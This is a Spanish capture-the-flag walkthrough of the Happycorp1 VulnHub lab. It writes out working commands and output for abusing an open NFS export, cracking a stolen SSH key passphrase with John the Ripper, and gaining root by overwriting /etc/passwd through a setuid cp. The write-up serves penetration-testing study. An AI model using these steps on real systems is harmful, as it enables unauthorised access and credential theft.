Happycorp1
resumen en portada
Nota: para reparar la red de la maquina:
entro en la maquina y reconfiguro la red
https://www.shellhacks.com/how-to-grant-root-access-user-root-privileges-linux/
1) Enumeración
- Escaneo la red:
ip a |grep global
nmap -sn 192.168.56.1/24 -T3
jejo@em50l:~$ ip a |grep global inet 192.168.56.1/24 brd 192.168.56.255 scope global vboxnet0 jejo@em50l:~$ nmap -sn 192.168.56.1/24 -T3 Starting Nmap 7.60 ( https://nmap.org ) at 2019-10-30 21:16 CET Nmap scan report for 192.168.56.101 Host is up (0.0017s latency).
- Escaneo la ip de la maquina a pentestear:
nmap -nT3 192.168.56.101
jejo@em50l:~$ nmap -nT3 192.168.56.101 Starting Nmap 7.60 ( https://nmap.org ) at 2019-10-30 21:32 CET Nmap scan report for 192.168.56.101 Host is up (0.0030s latency). Not shown: 996 closed ports PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 111/tcp open rpcbind 2049/tcp open nfs
- escaneo http
nmap -n 192.168.56.101 -p 80 -script *http*
jejo@em50l:~$ nmap -n 192.168.56.101 -p 80 -script *http* Starting Nmap 7.60 ( https://nmap.org ) at 2019-10-30 21:41 CET Nmap scan report for 192.168.56.101 Host is up (0.00041s latency). PORT STATE SERVICE 80/tcp open http | http-enum: | /admin.php: Possible admin folder | /robots.txt: Robots file | /css/: Potentially interesting directory w/ listing on 'apache/2.4.25' | /img/: Potentially interesting directory w/ listing on 'apache/2.4.25' | /js/: Potentially interesting directory w/ listing on 'apache/2.4.25' | /lib/: Potentially interesting directory w/ listing on 'apache/2.4.25' |_ /manual/: Potentially interesting folder Nmap done: 1 IP address (1 host up) scanned in 1.47 seconds
- echemosle un ojo a la web (http):
.
- echemosle un ojo al nfs:
root@kali:~# showmount -e 192.168.56.101 Export list for 192.168.56.101: /home/karl *
root@kali:~# mkdir /mnt/nfs
root@kali:~# sudo mount -t nfs 192.168.56.101:/home/karl /mnt/nfs
root@kali:~# ls -lha /mnt/nfs/
total 28K
drwxr-xr-x 3 1001 1001 4.0K Mar 5 2019 .
drwxr-xr-x 3 root root 4.0K Oct 30 17:36 ..
lrwxrwxrwx 1 root root 9 Mar 5 2019 .bash_history -> /dev/null
-rw-r--r-- 1 1001 1001 220 Mar 4 2019 .bash_logout
-rw-r--r-- 1 1001 1001 3.5K Mar 5 2019 .bashrc
-rw------- 1 1001 1001 28 Mar 4 2019 .lesshst
-rw-r--r-- 1 1001 1001 675 Mar 4 2019 .profile
drwx------ 2 1001 1001 4.0K Mar 5 2019 .ssh
https://www.cyberciti.biz/faq/howto-see-shares-on-nfs-server-exported-filesystems/
- Parece que la carpeta .ssh puede tener algo interesante.
Veamos que contiene:
root@kali:~# ls -lha /mnt/nfs/.ssh/ ls: cannot open directory '/mnt/nfs/.ssh/': Permission denied
Permiso denegado (siendo root)????
Tendre que crear un usuario con el id 1001:
useradd --uid 1001 aux_user
root@kali:~# useradd --uid 1001 aux_user
root@kali:~# ls -lha /mnt/nfs/
total 28K
drwxr-xr-x 3 aux_user aux_user 4.0K Mar 5 2019 .
drwxr-xr-x 3 root root 4.0K Oct 30 17:36 ..
lrwxrwxrwx 1 root root 9 Mar 5 2019 .bash_history -> /dev/null
-rw-r--r-- 1 aux_user aux_user 220 Mar 4 2019 .bash_logout
-rw-r--r-- 1 aux_user aux_user 3.5K Mar 5 2019 .bashrc
-rw------- 1 aux_user aux_user 28 Mar 4 2019 .lesshst
-rw-r--r-- 1 aux_user aux_user 675 Mar 4 2019 .profile
drwx------ 2 aux_user aux_user 4.0K Mar 5 2019 .ssh
Ahora con los permisos del usuario 1001 ya deberia poder ver el contenido de .ssh Lo imaginado unos archivos(certificados) de acceso
root@kali:~# su aux_user $ ls -lha /mnt/nfs/.ssh total 24K drwx------ 2 aux_user aux_user 4.0K Mar 5 2019 . drwxr-xr-x 3 aux_user aux_user 4.0K Mar 5 2019 .. -rw-r--r-- 1 aux_user aux_user 740 Mar 4 2019 authorized_keys -rw------- 1 aux_user aux_user 3.3K Mar 4 2019 id_rsa -rw-r--r-- 1 aux_user aux_user 740 Mar 4 2019 id_rsa.pub -rw-r--r-- 1 aux_user aux_user 18 Mar 4 2019 user.txt
root@kali:~# su aux_user -c "cat /mnt/nfs/.ssh/user.txt" flag1{Z29vZGJveQ}
Conseguido Primer Flag flag1{Z29vZGJveQ}
root@kali:~# su aux_user -c "cat /mnt/nfs/.ssh/authorized_keys" ssh-rsa AAAAB3Nza.......GVm7Q== karl@happycorp
ok el usuario es karl
root@kali:~# su aux_user -c "cat /mnt/nfs/.ssh/id_rsa.pub" ssh-rsa AAAAB3Nza.......GVm7Q== karl@happycorp
Y tenemos la llave privada. id_rsa
Veamos si nos deja entrar via ssh usando el certificado encontrado.
ssh karl@192.168.56.101 -i /mnt/nfs/.ssh/id_rsa
$ ssh karl@192.168.56.101 -i /mnt/nfs/.ssh/id_rsa Could not create directory '/home/aux_user/.ssh'. The authenticity of host '192.168.56.101 (192.168.56.101)' can't be established. ECDSA key fingerprint is SHA256:uXiM0zLVXRQYHkhNxuTByBPb14pH1AJn6IpACByicCY. Are you sure you want to continue connecting (yes/no)? yes Failed to add the host to the list of known hosts (/home/aux_user/.ssh/known_hosts). Enter passphrase for key '/mnt/nfs/.ssh/id_rsa':
Ups Problema… necesitare averiguar la contraseña del certificado (archivo llave)….
Buscando un poco
RSA PRIVATE KEY lost pass phrase
`encuentro:
Encuentro: https://askubuntu.com/questions/346114/how-to-retrieve-passphrase-for-private-keySegunda Busqueda:
john rip RSA PRIVATE KEY
https://bytesoverbombs.io/cracking-everything-with-john-the-ripper-d434f0f6dc1cLeyendo veo que Falta el comando
ssh2john
(Lo busco conlocate *2john
)
Preparativos
root@kali:~# su aux_user -c "cat /mnt/nfs/.ssh/id_rsa" > id_rsa.crack root@kali:~# wget https://raw.githubusercontent.com/magnumripper/JohnTheRipper/bleeding-jumbo/run/ssh2john.py root@kali:~# su aux_user -c "cat /mnt/nfs/.ssh/id_rsa" > id_rsa.crack root@kali:~# python ./ssh2john.py id_rsa.crack > id_rsa.crack.txt
> Notas/Consultas utiles: `john --help` / `locate *rockyou*` / `locate john`
root@kali:~# john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa.crack.txt Using default input encoding: UTF-8 Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/32]) Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes Cost 2 (iteration count) is 1 for all loaded hashes Note: This format may emit false positives, so it will keep trying even after finding a possible candidate. Press 'q' or Ctrl-C to abort, almost any other key for status sheep (id_rsa.crack) 1g 0:00:00:25 DONE (2019-11-19 17:12) 0.03897g/s 558912p/s 558912c/s 558912C/s *7¡Vamos! Session completedParece que la contraseña es **`sheep`** ___________
## Probemos conexion ssh
root@kali:~# ssh karl@192.168.56.101 -i id_rsa.crack Enter passphrase for key 'id_rsa.crack': sheep Linux happycorp 4.9.0-8-amd64 #1 SMP Debian 4.9.144-3.1 (2019-02-19) x86_64 The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. Last login: Wed Oct 30 18:36:40 2019 from 192.168.56.105 rbash: warning: shell level (1000) too high, resetting to 1 rbash: fork: retry: Resource temporarily unavailable rbash: fork: retry: Resource temporarily unavailable rbash: fork: retry: Resource temporarily unavailable rbash: fork: retry: Resource temporarily unavailable rbash: fork: Resource temporarily unavailable karl@happycorp:~$
Ups parece que hay un problema: el shell
no funciona bien.
Pruebo con un shell alternativo: ssh karl@192.168.56.101 -i id_rsa.crack -t /bin/sh
root@kali:~# ssh karl@192.168.56.101 -i id_rsa.crack -t /bin/sh Enter passphrase for key 'id_rsa.crack': $ $ whoami karl $
Escalada de privilegios: Enumeracion
- Enumeracion (desde shell): Version sistema operativo y Kernel
uname -a
/cat /etc/*release
$ uname -a Linux happycorp 4.9.0-8-amd64 #1 SMP Debian 4.9.144-3.1 (2019-02-19) x86_64 GNU/Linux $ cat /etc/*release PRETTY_NAME="Debian GNU/Linux 9 (stretch)"
- Busqueda exploits para sis operativo y nucleo:
searchsploit Debian 4.9
root@kali:~# searchsploit Debian 4.9 Exploits: No Result Shellcodes: No Result
Sin Resultado.
Otra forma: auto_searchsploit.py
root@kali:~# https://raw.githubusercontent.com/ngalongc/AutoLocalPrivilegeEscalation/master/auto_priv_exploit.sh root@kali:~# bash auto_priv_exploit.sh 4.9 [*] Possible Exploit No possible exploit. Please use another version. root@kali:~# python auto_searchsploit.py 4.9 [-] No potential exploit found. Aborting...
- Enumeracion: LinEnum.sh
- Descargo Lienum o Copio archivo a la maquina destino
root@kali:~# scp -i id_rsa.crack ./LinEnum.sh karl@192.168.56.101:/tmp Enter passphrase for key 'id_rsa.crack': LinEnum.sh 100% 45KB 4.0MB/s 00:00
- Demasiada informacion (la voy a filtrar un poco)
-e [+] It looks like we have password hashes in /etc/passwd! toor:$1$toor$2SrtV0M1RHrAj9uQL5C7w/:0:0:root:/root:/bin/bash -e [-] Available shells: # /etc/shells: valid login shells /bin/sh /bin/dash /bin/bash /bin/rbash -e ### INTERESTING FILES #################################### -e [-] Useful file locations: /bin/nc /bin/netcat /usr/bin/wget /usr/bin/gcc -e [-] Installed compilers: ii gcc 4:6.3.0-4 amd64 GNU C compiler ii gcc-6 6.3.0-18+deb9u1 amd64 GNU C compiler -e [+] Possibly interesting SUID files: -rwsr-xr-x 1 root root 130504 Feb 22 2017 /bin/cp -e
!!!comando cp con privilegios root!!!
Veamos si es explotable:
https://gtfobins.github.io/gtfobins/cp/
- Enumeracion: LinuxSmartEnumeration lse.sh
- Aunque ya hemos enumeravo voy a dejar esta opcion
root@kali:~# wget "https://raw.githubusercontent.com/diego-treitos/linux-smart-enumeration/master/lse.sh" root@kali:~# scp -i id_rsa.crack ./lse.sh karl@192.168.56.101:/tmp Enter passphrase for key 'id_rsa.crack': lse.sh 100% 31KB 1.6MB/s 00:00
root@kali:~# ssh karl@192.168.56.101 -i id_rsa.crack -t /bin/bash /tmp/lse.sh Enter passphrase for key 'id_rsa.crack': --- User: karl User ID: 1001 Password: none Home: /home/karl Path: /usr/local/bin:/usr/bin:/bin:/usr/games umask: 0022 Hostname: happycorp Linux: 4.9.0-8-amd64 Distribution: Debian GNU/Linux 9.8 (stretch) Architecture: x86_64 ==================================================================( users )===== [i] usr000 Current user groups............................................. yes! [*] usr010 Is current user in an administrative group?..................... nope [*] usr020 Are there other users in an administrative groups?.............. nope [*] usr030 Other users with shell.......................................... yes! [i] usr040 Environment information......................................... skip [i] usr050 Groups for other users.......................................... skip [i] usr060 Other users..................................................... skip ===================================================================( sudo )===== [!] sud000 Can we sudo without a password?................................. nope [!] sud010 Can we list sudo commands without a password?................... nope [*] sud040 Can we read /etc/sudoers?....................................... nope [*] sud050 Do we know if any other users used sudo?........................ nope ============================================================( file system )===== [*] fst000 Writable files outside user's home.............................. yes! [*] fst010 Binaries with setuid bit........................................ yes! [!] fst020 Uncommon setuid binaries........................................ yes! --- /bin/cp --- [!] fst030 Can we write to any setuid binary?.............................. nope [*] fst040 Binaries with setgid bit........................................ skip [!] fst050 Uncommon setgid binaries........................................ skip [!] fst060 Can we write to any setgid binary?.............................. skip [*] fst070 Can we read /root?.............................................. nope [*] fst080 Can we read subdirectories under /home?......................... nope [*] fst090 SSH files in home directories................................... yes! [*] fst100 Useful binaries................................................. yes! [*] fst110 Other interesting files in home directories..................... nope [!] fst120 Are there any credentials in fstab/mtab?........................ nope [*] fst130 Does 'karl' have mail?.......................................... nope [!] fst140 Can we access other users mail?................................. nope [*] fst150 Looking for GIT/SVN repositories................................ nope [!] fst160 Can we write to critical files?................................. nope [i] fst500 Files owned by user 'karl'...................................... skip [i] fst510 SSH files anywhere.............................................. skip [i] fst520 Check hosts.equiv file and its contents......................... skip [i] fst530 List NFS server shares.......................................... skip [i] fst540 Dump fstab file................................................. skip =================================================================( system )===== [i] sys000 Who is logged in................................................ skip [i] sys010 Last logged in users............................................ skip [!] sys020 Does the /etc/passwd have hashes?............................... yes! --- toor:$1$toor$2SrtV0M1RHrAj9uQL5C7w/:0:0:root:/root:/bin/bash --- [!] sys030 Can we read /etc/shadow file?................................... nope [!] sys030 Can we read /etc/shadow- file?.................................. nope [!] sys030 Can we read /etc/shadow~ file?.................................. nope [!] sys030 Can we read /etc/master.passwd file?............................ nope [*] sys040 Check for other superuser accounts.............................. yes! [*] sys050 Can root user log in via SSH?................................... nope [i] sys060 List available shells........................................... skip [i] sys070 System umask in /etc/login.defs................................. skip [i] sys080 System password policies in /etc/login.defs..................... skip ===============================================================( security )===== [*] sec000 Is SELinux present?............................................. nope [*] sec010 List files with capabilities.................................... nope [!] sec020 Can we write to a binary with caps?............................. nope [!] sec030 Do we have all caps in any binary?.............................. nope [*] sec040 Users with associated capabilities.............................. nope [!] sec050 Does current user have capabilities?............................ skip ========================================================( recurrent tasks )===== [*] ret000 User crontab.................................................... nope [!] ret010 Cron tasks writable by user..................................... nope [*] ret020 Cron jobs....................................................... yes! [*] ret030 Can we read user crontabs....................................... nope [*] ret040 Can we list other user cron tasks?.............................. nope [!] ret050 Can we write to executable paths present in cron jobs........... nope [*] ret060 Can we write to any paths present in cron jobs.................. nope [i] ret400 Cron files...................................................... skip [*] ret500 User systemd timers............................................. nope [!] ret510 Can we write in any system timer?............................... nope [i] ret900 Systemd timers.................................................. skip ================================================================( network )===== [*] net000 Services listening only on localhost............................ nope [!] net010 Can we sniff traffic with tcpdump?.............................. nope [i] net500 NIC and IP information.......................................... skip [i] net510 Routing table................................................... skip [i] net520 ARP table....................................................... skip [i] net530 Namerservers.................................................... skip [i] net540 Systemd Nameservers............................................. skip [i] net550 Listening TCP................................................... skip [i] net560 Listening UDP................................................... skip ===============================================================( services )===== [!] srv000 Can we write in service files?.................................. nope [!] srv010 Can we write in binaries executed by services?.................. nope [*] srv020 Files in /etc/init.d/ not belonging to root..................... nope [*] srv030 Files in /etc/rc.d/init.d not belonging to root................. nope [*] srv040 Upstart files not belonging to root............................. nope [*] srv050 Files in /usr/local/etc/rc.d not belonging to root.............. nope [i] srv400 Contents of /etc/inetd.conf..................................... skip [i] srv410 Contents of /etc/xinetd.conf.................................... skip [i] srv420 List /etc/xinetd.d if used...................................... skip [i] srv430 List /etc/init.d/ permissions................................... skip [i] srv440 List /etc/rc.d/init.d permissions............................... skip [i] srv450 List /usr/local/etc/rc.d permissions............................ skip [i] srv460 List /etc/init/ permissions..................................... skip [!] srv500 Can we write in systemd service files?.......................... nope [!] srv510 Can we write in binaries executed by systemd services?.......... nope [*] srv520 Systemd files not belonging to root............................. nope [i] srv900 Systemd config files permissions................................ skip ==============================================================( processes )===== [!] pro000 Can we write in any process binary?............................. nope [*] pro010 Processes running with root permissions......................... yes! [i] pro500 Running processes............................................... skip [i] pro510 Running process binaries and permissions........................ skip ===============================================================( software )===== [!] sof000 Can we connect to MySQL with root/root credentials?............. nope [!] sof010 Can we connect to MySQL as root without password?............... nope [!] sof020 Can we connect to PostgreSQL template0 as postgres and no pass?. nope [!] sof020 Can we connect to PostgreSQL template1 as postgres and no pass?. nope [!] sof020 Can we connect to PostgreSQL template0 as psql and no pass?..... nope [!] sof020 Can we connect to PostgreSQL template1 as psql and no pass?..... nope [*] sof030 Installed apache modules........................................ yes! [!] sof040 Found any .htpasswd files?...................................... nope [i] sof500 Sudo version.................................................... skip [i] sof510 MySQL version................................................... skip [i] sof520 Postgres version................................................ skip [i] sof530 Apache version.................................................. skip =============================================================( containers )===== [*] ctn000 Are we in a docker container?................................... nope [*] ctn010 Is docker available?............................................ nope [!] ctn020 Is the user a member of the 'docker' group?..................... nope [*] ctn200 Are we in a lxc container?...................................... nope [!] ctn210 Is the user a member of any lxc/lxd group?...................... nope ==================================( FINISHED )================================== Connection to 192.168.56.101 closed.A destacar:
[!] fst020 Uncommon setuid binaries........................................ yes! --- /bin/cp ---
!!!comando cp con privilegios root!!!
Veamos si es explotable:
https://gtfobins.github.io/gtfobins/cp/
Escalada de privilegios: Explotacion Vulnerabilidades encontradas.
https://gtfobins.github.io/gtfobins/cp/
La estrategia seria:
- Generar una linea de password:
- basandome en como es la linea de root en /etc/password
Genero una linea parecida con un password en lugar d `:x:`
root@kali:~# cat /etc/passwd | grep root root:x:0:0:root:/root:/bin/bash root@kali:~# openssl passwd -1 -salt jejo jejo $1$jejo$4.S4N2nsF5I9dhmE1iqLD/ root@kali:~# echo 'jejo:$1$jejo$4.S4N2nsF5I9dhmE1iqLD/:0:0:root:/root:/bin/bash' jejo:$1$jejo$4.S4N2nsF5I9dhmE1iqLD/:0:0:root:/root:/bin/bash
copiar el archivo /etc/password a una ruta temporal. (asi libero permisos)
cp /etc/passwd /tmp/passwd
Añadir al archivo password la linea generada
$ echo 'jejo:$1$jejo$4.S4N2nsF5I9dhmE1iqLD/:0:0:root:/root:/bin/bash' >> /tmp/passwd /bin/sh: 13: cannot create /tmp/passwd: Permission deniedUps no me deja. pues añado la linea con nano y guardo como passwd2
- Copiar el archivo password modificado a su ruta original
$ cp /tmp/passwd2 /etc/passwd $ tail -2 /etc/passwd
statd:x:107:65534::/var/lib/nfs:/bin/false jejo:$1$jejo$4.S4N2nsF5I9dhmE1iqLD/:0:0:root:/root:/bin/bash
Conseguido ROOT
$ su jejo Password: root@happycorp:/tmp# whoami root
Aqui esta el Flag
root@happycorp:~# cat /root/root.txt Congrats! flag2{aGFja2VyZ29k} Here is some useless ascii art :) ,----------------, ,---------, ,-----------------------, ," ,"| ," ,"| ," ," | +-----------------------+ | ," ," | | .-----------------. | | +---------+ | | | | | | | -==----'| | | | | | | | | | | | Hacker God | | |/----|`---= | | | | C:\>_ | | | ,/|==== ooo | ; | | | | | // |(((( [33]| ," | `-----------------' |," .;'| |(((( | ," +-----------------------+ ;; | | |," /_)______________(_/ //' | +---------+ ___________________________/___ `, / oooooooooooooooo .o. oooo /, \,"----------- / ==ooooooooooooooo==.o. ooo= // ,`\--{)B ," /_==__==========__==_ooo__ooo=_/' /___________," -Zayotic
Referencias
https://www.hackingarticles.in/happycorp1-vulnhub-walkthrough/
https://www.hackingarticles.in/beginners-guide-for-john-the-ripper-part-2/
https://bytesoverbombs.io/cracking-everything-with-john-the-ripper-d434f0f6dc1c
https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
https://gtfobins.github.io/gtfobins/cp/
A investigar:
https://www.shellhacks.com/linux-generate-password-hash/
https://www.hackplayers.com/2016/12/automatizando-el-escalado-de.html
https://github.com/ngalongc/AutoLocalPrivilegeEscalation